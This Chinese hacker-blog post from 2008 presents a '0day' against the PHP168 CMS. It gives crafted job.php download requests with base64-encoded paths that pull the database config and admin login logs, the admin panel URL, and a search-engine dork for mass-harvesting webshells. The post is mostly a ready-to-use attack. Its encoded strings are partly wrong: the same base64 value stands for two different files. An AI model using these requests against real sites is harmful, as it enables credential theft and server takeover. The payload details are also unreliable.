PHP168整站系统0DAY
2008-11-1 21:10:17 分类:漏洞信息 作者:xloong 已被围观loading 次 被网友评论0条 我要评论
先说明下是这个漏洞是在其他地方看到的,只是他没有说的很清楚,好多菜菜都不明白,我就拿这发我的第一个贴吧!
这个漏洞其实就是利用了程序的编码漏洞,下载配置和登陆日志文件,以下是利用方法。
下载 mysql_config.php 和 adminlogin_logs.php 两个文件到本地。
http://dabei.org//job.php?job=download&url="aHR0cDovL2RhYmVpLm9yZy8vY2FjaGUvYWRtaW5sb2dpbl9sb2dzLnBocA=="
http://dabei.org//job.php?job=download&url="aHR0cDovL2RhYmVpLm9yZy8vY2FjaGUvYWRtaW5sb2dpbl9sb2dzLnBocA=="
程序后台:
http://dabei.org/admin/index.php?iframe=1
Base64加密代码:
http://dabei.org//cache/adminlogin_logs.php == "aHR0cDovL2RhYmVpLm9yZy8vY2FjaGUvYWRtaW5sb2dpbl9sb2dzLnBocA=="
(引号里面的是Base64加密后的)
http://dabei.org//php168/mysql_config.php == "aHR0cDovL2RhYmVpLm9yZy8vY2FjaGUvYWRtaW5sb2dpbl9sb2dzLnBocA=="
(引号里面的是Base64加密后的)
批量抓webshell:
google,baidu 输入关键字:Powered by PHP168
From: http://www.hack58.net/Article/html/3/62/2008/20875.htm
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
如原创文章转载,请注明: 转自:夜火博客 [ http://www.15897.com/ ]
本文链接地址: http://www.15897.com/blog/post/PHP168-0day.html
已有0位网友对本文做了一针见血的评论 【我要评论】
相关文章
- 0条评论
- 引用通告
- 收起评论列表
评论:
订阅RSS
搜 索
最新发表
最新评论
最新留言
其 他